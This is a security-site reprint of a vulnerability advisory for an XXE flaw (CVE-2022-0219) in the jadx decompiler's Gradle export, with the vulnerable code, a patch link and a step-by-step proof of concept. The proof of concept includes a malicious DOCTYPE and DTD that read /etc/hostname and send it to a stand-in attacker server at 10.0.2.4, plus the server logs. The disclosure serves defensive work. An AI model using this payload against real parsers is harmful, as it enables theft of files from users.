Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-0219: Improper Restriction of XML External Entity Reference in jadx

Improper Restriction of XML External Entity Reference in GitHub repository skylot/jadx prior to 1.3.2.

CVE
Open in Source
#vulnerability#android#google#git#java

Description

parseXml() function in ExportGradleProject is not secured against XXE because it does not include the disallow-doctype-decl attribute, therefore JADX is vulnerable to XXE when parsing a malicious Android Manifest when exporting Android app to Gradle. In

https://github.com/skylot/jadx/blob/f9bf27579e3ad5f89239ea9f571e8b50739e8920/jadx-core/src/main/java/jadx/core/export/ExportGradleProject.java#L142L147

DocumentBuilder builder = DocumentBuilderFactory.newInstance().newDocumentBuilder();
Document document = builder.parse(new InputSource(new StringReader(xmlContent)));

DocumentBuilderFactory does not have disallow-doctype-decl attribute set to true, leaving it vulnerable to XXE.

Proof Of Concept

1: Build an android app with the following AndroidManifest.xml stored. You can use my built APK with a malicious AndroidManifest.xml file https://drive.google.com/file/d/1D4QBk-YJH8xadGv1vpz9rBTDN9X43pUC/view?usp=sharing in order to test this.

<?xml version="1.0" encoding="utf-8" standalone="no"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://127.0.0.1/malicious.dtd"> %xxe;]>
... [---malicious APK continued here---]

2: Open a new terminal and place in a file name malicious.dtd

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://10.0.2.4/?x=%file;'>">
%eval;
%exfiltrate;

3: In the same terminal as step 2, open a HTTP server (which mimics an attacker server) and leave it running

➜  ~ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/)

4: Now, export the APK to Gradle

jadx -e /path/to/malicious/apkfile.apk

5: The HTTP server (which mimics an attacker server will receive the contents of victim /etc/hostname

➜  ~ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.0.2.4 - - [12/Jan/2022 14:36:41] "GET /malicious.dtd HTTP/1.1" 200 -
10.0.2.4 - - [12/Jan/2022 14:36:41] "GET /?x=testserver HTTP/1.1" 200 -

Impact

This vulnerability is capable of XXE (info disclosure) when users are tricked into exporting a malicious Android App with a crafted AndroidManifest file to Gradle.

Patch

https://github.com/Haxatron/jadx/commit/c6a78c0d6dc990a4a0f8962d51823aa6ca3aefd2

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE